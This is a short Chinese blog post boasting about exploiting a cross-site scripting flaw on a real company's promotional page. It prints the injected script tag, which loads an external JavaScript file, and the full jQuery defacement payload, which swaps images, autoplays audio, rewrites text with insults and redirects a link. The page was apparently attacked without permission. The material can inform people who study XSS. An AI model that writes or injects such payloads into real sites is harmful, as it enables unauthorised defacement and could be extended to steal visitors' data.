霍格沃茨特快列车
Mkapakka's Hut
向日葵8活动页面已被玩坏23333333

先上地址吧:http://www.oray.com/activity/150903/ 目测已经被多名小伙伴玩坏…

10.5 晚已被修复

今早群里的一名小伙伴发现了向日葵8的活动页面可以XSS,然后… 当然我们没有干偷cookies这种事,不过对于向日(妹)葵的程序猴子写的下三滥代码十分痛心,于是…

第一步先改个title,页面都可以XSS,当然要狠狠的批评下程序猿..

_(:3 」∠)_然后加个Nico的banner和alert弹窗~NiCoNiCoNi~~

与正常的对比:

然后改下各项的内容(点击看大图):

最后加个国歌的BGM,统一放到一个js里。 外链插入

<script src="http://files.cnblogs.com/files/b1ta/poororay.js"</script>

上代码:

$(function (){
$('.banner').html('<img src="http://ww2.sinaimg.cn/large/006biCeojw1ewpaugcompj31hc0xcwvw.jpg" width="800"/>');
$('body').append('<audio src="http://apt.feng.com/resource/package/origin/mp3/00/00/67/09/44/52d0b837319a39ab638b4995/ring.weiphone.yiyongjunjinxingqu.mp3" autoplay="autoplay" />');
$('.item01 img').attr('src','http://ww1.sinaimg.cn/large/006biCeojw1ewpfclhqh4j30sg06st9t.jpg');
$('.item02 img').attr('src','http://ww2.sinaimg.cn/large/006biCeojw1ewpdvws7x3j30sg06o74v.jpg');
$('.item03 img').attr('src','http://ww2.sinaimg.cn/large/006biCeojw1ewpezud9vlj30sg07jt9y.jpg');
$('textarea').attr('placeholder','向日妹的工程师都去日妹了_(:3 」∠)_');
$(':button').html('吔屎!');
$('.item01 a').attr('href','http://www.gov.cn');
});
document.title='向日葵8已萎了'
<!-- document.getElementById("btn").innerHTML = "吔屎!"; -->
alert('NiCoNiCoNi~')

最终成果图:

_(:3 」∠)_我们并没有恶意…怪你们程序猿咯…


Last modified on 2015-10-05